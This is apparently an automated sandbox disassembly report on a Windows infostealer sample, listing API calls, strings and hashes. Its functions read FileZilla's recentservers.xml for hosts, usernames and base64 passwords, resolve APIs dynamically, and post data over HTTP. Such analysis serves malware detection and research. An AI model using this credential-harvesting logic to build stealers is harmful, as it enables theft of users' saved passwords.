lstrlenA.KERNEL32(35442020), ref: 00407E6B
lstrlenA.KERNEL32(35442020), ref: 00407E7B

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 1a9d6fb503fb913faee09f78ac793ac6dc3067147ee9e0764d82c310f013f8e9
Instruction ID: 1e9b08135f7dcdfaa8f2c2dd520ea7fbbb4c73797e410f6fed26cf7179196423
Opcode Fuzzy Hash: 1a9d6fb503fb913faee09f78ac793ac6dc3067147ee9e0764d82c310f013f8e9
Instruction Fuzzy Hash: 8B3264B2C00615ABCB25EBA0DC89DDE773DAB48704F444A9DF60962090EE79E7C5CF64

Function 00410090 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
Part of subcall function 00409A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00409AEA

Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2

strtok_s.MSVCRT ref: 0041015B
GetProcessHeap.KERNEL32(00000000,000F423F,00420DA6,00420DA3,00420DA2,00420D9F), ref: 004101A2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 004101A9
StrStrA.SHLWAPI(00000000,<Host>), ref: 004101C5
lstrlenA.KERNEL32(00000000), ref: 004101D3

Part of subcall function 00418380: malloc.MSVCRT ref: 00418388
Part of subcall function 00418380: strncpy.MSVCRT ref: 004183A3

StrStrA.SHLWAPI(00000000,<Port>), ref: 0041020F
lstrlenA.KERNEL32(00000000), ref: 0041021D
StrStrA.SHLWAPI(00000000,<User>), ref: 00410259
lstrlenA.KERNEL32(00000000), ref: 00410267
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004102A3
lstrlenA.KERNEL32(00000000), ref: 004102B5
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 00410342
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041035A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410372
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041038A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 004103A2
lstrcat.KERNEL32(?,profile: null), ref: 004103B1
lstrcat.KERNEL32(?,url: ), ref: 004103C0
lstrcat.KERNEL32(?,00000000), ref: 004103D3
lstrcat.KERNEL32(?,0042161C), ref: 004103E2
lstrcat.KERNEL32(?,00000000), ref: 004103F5
lstrcat.KERNEL32(?,00421620), ref: 00410404
lstrcat.KERNEL32(?,login: ), ref: 00410413
lstrcat.KERNEL32(?,00000000), ref: 00410426
lstrcat.KERNEL32(?,0042162C), ref: 00410435
lstrcat.KERNEL32(?,password: ), ref: 00410444
lstrcat.KERNEL32(?,00000000), ref: 00410457
lstrcat.KERNEL32(?,0042163C), ref: 00410466
lstrcat.KERNEL32(?,00421640), ref: 00410475
strtok_s.MSVCRT ref: 004104B9
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420D9E), ref: 004104CE
memset.MSVCRT ref: 0041051D

Strings

browser: FileZilla, xrefs: 00410399
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 004100E4
<User>, xrefs: 00410250
<Pass encoding="base64">, xrefs: 0041029A
<Port>, xrefs: 00410206
<Host>, xrefs: 004101BC
url: , xrefs: 004103B7
profile: null, xrefs: 004103A8
password: , xrefs: 0041043B
login: , xrefs: 0041040A

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1266801029-555421843
Opcode ID: 59201731c47b74e4159c91937b4c89c1e54db2b78fd0c4663f82ce87d4457ff4
Instruction ID: f2c119995f801d95b771d97b8d40ebd85ad32e2919b54f786426441ea9706e1a
Opcode Fuzzy Hash: 59201731c47b74e4159c91937b4c89c1e54db2b78fd0c4663f82ce87d4457ff4
Instruction Fuzzy Hash: BBD1A571A00108ABCB04EBF1DC4AEEE7739AF54314F50851EF103A7191DF78AA95CB69

Function 00419270 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,0271B960), ref: 004192B1
GetProcAddress.KERNEL32(75900000,0271B990), ref: 004192CA
GetProcAddress.KERNEL32(75900000,0271BC18), ref: 004192E2
GetProcAddress.KERNEL32(75900000,0271BA38), ref: 004192FA
GetProcAddress.KERNEL32(75900000,0271BA98), ref: 00419313
GetProcAddress.KERNEL32(75900000,02716708), ref: 0041932B
GetProcAddress.KERNEL32(75900000,02715D60), ref: 00419343
GetProcAddress.KERNEL32(75900000,02715CA0), ref: 0041935C
GetProcAddress.KERNEL32(75900000,0271BC00), ref: 00419374
GetProcAddress.KERNEL32(75900000,0271BC90), ref: 0041938C
GetProcAddress.KERNEL32(75900000,0271BAE0), ref: 004193A5
GetProcAddress.KERNEL32(75900000,0271BAC8), ref: 004193BD
GetProcAddress.KERNEL32(75900000,02715C40), ref: 004193D5
GetProcAddress.KERNEL32(75900000,0271BAF8), ref: 004193EE
GetProcAddress.KERNEL32(75900000,0271BA50), ref: 00419406
GetProcAddress.KERNEL32(75900000,02715A80), ref: 0041941E
GetProcAddress.KERNEL32(75900000,0271BC78), ref: 00419437
GetProcAddress.KERNEL32(75900000,0271BB10), ref: 0041944F
GetProcAddress.KERNEL32(75900000,02715C00), ref: 00419467
GetProcAddress.KERNEL32(75900000,0271BC30), ref: 00419480
GetProcAddress.KERNEL32(75900000,02715DE0), ref: 00419498
LoadLibraryA.KERNEL32(0271BBD0,?,004164A0), ref: 004194AA
LoadLibraryA.KERNEL32(0271BA80,?,004164A0), ref: 004194BB
LoadLibraryA.KERNEL32(0271BC48,?,004164A0), ref: 004194CD
LoadLibraryA.KERNEL32(0271BBE8,?,004164A0), ref: 004194DF
LoadLibraryA.KERNEL32(0271BBB8,?,004164A0), ref: 004194F0
GetProcAddress.KERNEL32(75070000,0271BB28), ref: 00419512
GetProcAddress.KERNEL32(75FD0000,0271BB88), ref: 00419533
GetProcAddress.KERNEL32(75FD0000,0271BBA0), ref: 0041954B
GetProcAddress.KERNEL32(75A50000,0271BCA8), ref: 0041956D
GetProcAddress.KERNEL32(74E50000,02715D40), ref: 0041958E
GetProcAddress.KERNEL32(76E80000,02716718), ref: 004195AF
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 004195C6

Strings

NtQueryInformationProcess, xrefs: 004195BA

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: NtQueryInformationProcess
API String ID: 2238633743-2781105232
Opcode ID: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
Instruction ID: 826a308167d33dd6e89c68d84aa8ae535e40b86c028b310e96c4c1ecb1cfdbe7
Opcode Fuzzy Hash: 3c4f576e88d1023c8c64455e8d299a229b8a4e9f9ed258e654ba581a00c5eb17
Instruction Fuzzy Hash: D3A171B5500A00EFC764DF68ED88E1E3BBBBB4C361B50A51AEA05C3674D7349843DBA5

Function 00405150 Relevance: 53.1, APIs: 22, Strings: 8, Instructions: 569
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

lstrlenA.KERNEL32(00000000), ref: 004051E3

Part of subcall function 00418940: CryptBinaryToStringA.CRYPT32(00000000,004051D4,40000001,00000000,00000000), ref: 00418960

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405257
StrCmpCA.SHLWAPI(?,0273B6D0), ref: 00405275
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405390
HttpOpenRequestA.WININET(00000000,0273B5E0,?,0273AD48,00000000,00000000,00400100,00000000), ref: 004053F4

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,0273B6F0,00000000,?,02718D00,00000000,?,00421980,00000000,?,00414CAF), ref: 00405787
lstrlenA.KERNEL32(00000000), ref: 0040579B
GetProcessHeap.KERNEL32(00000000,?), ref: 004057AC
HeapAlloc.KERNEL32(00000000), ref: 004057B3
lstrlenA.KERNEL32(00000000), ref: 004057C8
memcpy.MSVCRT ref: 004057DF
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 004057F9
memcpy.MSVCRT ref: 00405806
lstrlenA.KERNEL32(00000000), ref: 00405818
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405831
memcpy.MSVCRT ref: 00405841
lstrlenA.KERNEL32(00000000,?,?), ref: 0040585E
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405872
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040589D
InternetCloseHandle.WININET(00000000), ref: 00405901
InternetCloseHandle.WININET(00000000), ref: 0040590E
InternetCloseHandle.WININET(00000000), ref: 00405918

Strings

------, xrefs: 004052E7
------, xrefs: 00405407
------, xrefs: 0040568B
", xrefs: 00405614
", xrefs: 004054D2
------, xrefs: 00405549
", xrefs: 00405756
--, xrefs: 004052D0

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$??2@AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 811081172-2774362122
Opcode ID: 6046af6a45afa90ab595c58cf068bdbb8eac6d8826a22b72e535decc21ddb31a
Instruction ID: 1d52745d65e853cf4120aa405e943018ad764f54ae2154c0ea3196726ecd4ecf
Opcode Fuzzy Hash: 6046af6a45afa90ab595c58cf068bdbb8eac6d8826a22b72e535decc21ddb31a
Instruction Fuzzy Hash: 8E325071921118ABCB14EBA1DC55FEEB338BF54314F40419EF50662192EF782B98CF6A

Function 004059B0 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6

Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 0040483A
Part of subcall function 00404800: ??_U@YAPAXI@Z.MSVCRT ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
StrCmpCA.SHLWAPI(?,0273B6D0), ref: 00405A63
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0273B690,00000000,?,02718D00,00000000,?,004219C0), ref: 00405EC1
lstrlenA.KERNEL32(00000000), ref: 00405ED2
GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
HeapAlloc.KERNEL32(00000000), ref: 00405EEA
lstrlenA.KERNEL32(00000000), ref: 00405EFF
memcpy.MSVCRT ref: 00405F16
lstrlenA.KERNEL32(00000000), ref: 00405F28
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
memcpy.MSVCRT ref: 00405F4E
lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
InternetCloseHandle.WININET(00000000), ref: 00406000
InternetCloseHandle.WININET(00000000), ref: 0040600D
HttpOpenRequestA.WININET(00000000,0273B5E0,?,0273AD48,00000000,00000000,00400100,00000000), ref: 00405C48

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

InternetCloseHandle.WININET(00000000), ref: 00406017

Strings

------, xrefs: 00405C5B
XA, xrefs: 004060CA
------, xrefs: 00405AE6
XA, xrefs: 00405A0F, 004060B7, 00405A97, 00405AA0, 00405B0E, 00405B85, 00405C83, 00405DC4, 00405B11, 00405B88, 00405C86, 00405DC7
", xrefs: 00405D25
------, xrefs: 00405D9C
", xrefs: 00405E66

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$??2@AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$XA$XA
API String ID: 1710586764-2501203334
Opcode ID: 4fd9ebd8356ffe59fc28b6d9c5dde2d6e2616a5ba3e3769baacda839f2747102
Instruction ID: fd4032899b6f210ca5ed4ade58f42d7f74ab7cfcec1a01a64090ede90c3e384c
Opcode Fuzzy Hash: 4fd9ebd8356ffe59fc28b6d9c5dde2d6e2616a5ba3e3769baacda839f2747102
Instruction Fuzzy Hash: 4C123F71921118ABCB14EBA1DC95FEEB338BF14314F40419EF50662191EF782B99CF69

Function 0040A6C0 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A440: StrCmpCA.SHLWAPI(00000000,00421414,0040CFE2,00421414,00000000), ref: 0041A45F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A9F2
RtlAllocateHeap.NTDLL(00000000), ref: 0040A9F9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A7DA

Part of subcall function 0041A1F0: lstrlenA.KERNEL32(00000000,?,?,00415634,00420AC3,00420AC2,?,?,004165B6,00000000,?,02716658,?,004210DC,?,00000000), ref: 0041A1FB
Part of subcall function 0041A1F0: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A255

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

lstrcat.KERNEL32(?,00000000), ref: 0040AB3A
lstrcat.KERNEL32(?,004212C4), ref: 0040AB49
lstrcat.KERNEL32(?,00000000), ref: 0040AB5C
lstrcat.KERNEL32(?,004212C8), ref: 0040AB6B
lstrcat.KERNEL32(?,00000000), ref: 0040AB7E
lstrcat.KERNEL32(?,004212CC), ref: 0040AB8D
lstrcat.KERNEL32(?,00000000), ref: 0040ABA0
lstrcat.KERNEL32(?,004212D0), ref: 0040ABAF
lstrcat.KERNEL32(?,00000000), ref: 0040ABC2
lstrcat.KERNEL32(?,004212D4), ref: 0040ABD1
lstrcat.KERNEL32(?,00000000), ref: 0040ABE4
lstrcat.KERNEL32(?,004212D8), ref: 0040ABF3

Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE

lstrcat.KERNEL32(?,00000000), ref: 0040AC3C
lstrcat.KERNEL32(?,004212DC), ref: 0040AC56
lstrlenA.KERNEL32(?), ref: 0040AC95
lstrlenA.KERNEL32(?), ref: 0040ACA4
memset.MSVCRT ref: 0040ACF3

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

DeleteFileA.KERNEL32(00000000), ref: 0040AD1F

Memory Dump Source

Source File: 00000000.00000002.2442165197.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2442165197.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2442165197.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: 85ea80aeef63fc7b0a0df60901b317a004031e1bd7051e43bc0aea3007b1b985
Instruction ID: db3bf564d8a269597709baab17c241dc92c2864a2a44399f5d1cb95b81495e87
Opcode Fuzzy Hash: 85ea80aeef63fc7b0a0df60901b317a004031e1bd7051e43bc0aea3007b1b985
Instruction Fuzzy Hash: 13029371901108ABCB14EBA1DC96EEE7339BF54314F10416EF507B20A1DF786E99CB6A

Function 0040CD30 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158

Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2

Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5

Part of subcall function 00418600: GetSystemTime.KERNEL32(?,02718CD0,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626

Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CDC3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040CF07
RtlAllocateHeap.NTDLL(00000000), ref: 0040CF0E
lstrcat.KERNEL32(?,00000000), ref: 0040D048
